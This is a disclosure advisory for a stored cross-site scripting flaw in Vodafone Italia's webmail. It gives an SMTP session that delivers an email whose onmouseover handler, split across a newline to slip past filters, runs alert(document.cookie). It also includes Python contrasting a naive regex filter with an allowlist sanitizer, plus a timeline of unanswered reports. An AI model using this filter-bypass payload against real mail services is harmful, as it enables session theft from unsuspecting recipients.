Vodafone Italia Webmail Cross Site Scripting

Vodafone Italia's webmail system suffers from a cross site scripting vulnerability that can be leveraged via an incoming email.


MD5 | d0d7db3a1272f4db6715ac4f88d6f69f

# Title: Vodafone Webmail - Stored Cross-Site Scripting
# Date: 2017-07-14
# Exploit Author: theMiddle / https://github.com/theMiddleBlue
# Website: https://web.mail.vodafone.it


1. Description
The Vodafone Italia webmail (web.mail.vodafone.it) suffers from a
stored cross-site scripting vulnerability. Its XSS filters can be evaded,
and the vulnerability exploited, by sending an e-mail message in the
specific format shown below.

After years of no answer from Vodafone, I decided to disclose it in order
to alert users and companies that use this webmail.


2. Exploit vulnerability
-------------------------------------------
# telnet mx.vodafone.arubamail.it 25
Trying 62.149.178.10...
Connected to mx.vodafone.arubamail.it.
Escape character is '^]'.
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready
HELO example.com
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you
MAIL FROM: themiddle@protonmail.ch
250 2.1.0 <themiddle@protonmail.ch> sender ok
RCPT TO: *****@vodafone.it
250 2.1.5 <*****@vodafone.it> recipient ok
DATA
354 enter mail, end with "." on a line by itself
Subject: test xss
From: theMiddle <themiddle@protonmail.ch>
To: *****@vodafone.it
Content-Type: text/html; charset=utf-8

<div onmouseover
="alert(document.cookie);"
style
="height:600px;">
test
</div>

.
250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery
QUIT
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection
Connection closed by foreign host.
--------------------------------------------

A screenshot of the executed JavaScript in the Chrome browser:
http://i.imgur.com/Ap4NK9c.png
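The bypass above works because the attribute name (`onmouseover`) and its `=` sign are separated by a newline, which a pattern-based filter that expects `on<name>="` as one token does not see, while a browser's tokeniser treats the attribute as perfectly well-formed. The following Python is an added defender-side example, not part of the advisory and not Vodafone's filter (whose implementation is unknown): it contrasts a hypothetical naive regex filter with an allowlist sanitizer built on `html.parser`, which delivers attribute names whole and lowercased regardless of surrounding whitespace. The naive pattern, the tag and attribute allowlists and the `SAFE_SCHEMES` list are assumptions constructed for this example; `SAMPLE_BODY` reproduces the message body from the transcript above.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: the HTML body from the advisory's SMTP transcript, with the
# event-handler attribute name separated from its '=' and value by newlines.
SAMPLE_BODY = """<div onmouseover
="alert(document.cookie);"
style
="height:600px;">
test
</div>"""

# Hypothetical pattern-based filter of the kind such a bypass defeats (the real
# filter's implementation is unknown). It expects 'on<name>="' as a single token.
NAIVE_PATTERN = re.compile(r'\bon\w+="', re.IGNORECASE)


def naive_filter_flags(body: str) -> bool:
    """Return True if the naive regex spots an inline event handler."""
    return NAIVE_PATTERN.search(body) is not None


class Sanitizer(HTMLParser):
    """Allowlist sanitizer: tokenises with html.parser, so every attribute name
    reaches handle_starttag whole and lowercased, whatever whitespace surrounds '='."""

    ALLOWED_TAGS = {"div", "p", "span", "b", "i", "a", "br"}   # assumed allowlist
    ALLOWED_ATTRS = {"style", "href", "title"}                 # assumed allowlist
    VOID_TAGS = {"br"}
    SAFE_SCHEMES = ("http:", "https:", "mailto:")              # assumed for href

    def __init__(self):
        super().__init__()   # convert_charrefs=True: text arrives decoded, we re-escape it
        self.out = []        # sanitized output fragments
        self.dropped = []    # (tag, attribute) pairs removed, for logging or alerting
        self._skip = 0       # >0 while inside <script>/<style>; their text is discarded

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag not in self.ALLOWED_TAGS:
            self.dropped.append((tag, None))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Every on* handler is removed, whatever its spelling or layout in the source.
            if name.startswith("on") or name not in self.ALLOWED_ATTRS:
                self.dropped.append((tag, name))
                continue
            if name == "href":
                # Remove whitespace and control characters before checking the scheme.
                scheme_probe = re.sub(r"[\s\x00-\x1f]", "", value).lower()
                if not scheme_probe.startswith(self.SAFE_SCHEMES):
                    self.dropped.append((tag, name))
                    continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in self.VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
        if tag in self.ALLOWED_TAGS and tag not in self.VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))


def sanitize(body: str):
    """Return (sanitized HTML, list of (tag, attribute) pairs that were dropped)."""
    s = Sanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out), s.dropped


if __name__ == "__main__":
    print("naive filter flags sample:", naive_filter_flags(SAMPLE_BODY))   # False: bypassed
    clean, dropped = sanitize(SAMPLE_BODY)
    print("sanitized:", clean)      # <div style="height:600px;"> ... </div>
    print("dropped:", dropped)      # [('div', 'onmouseover')]
```

The `dropped` list is the detection hook: a webmail that logs which attributes its sanitizer removed from inbound messages gets an early signal of this kind of probing, whereas a regex filter that silently passes the split attribute records nothing. Rebuilding the output from the parsed tokens, rather than deleting matched substrings from the raw HTML, also means the result contains only what the allowlist explicitly permits.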


3. Timeline
2014-10-31: Initial report to Vodafone's abuse e-mail address (no answer received).
2015-06-25: Second contact via social network (no answer received).
2017-07-13: Third e-mail to italy.abuse@mail.vodafone.it (no answer received).
2017-07-14: Disclosure.
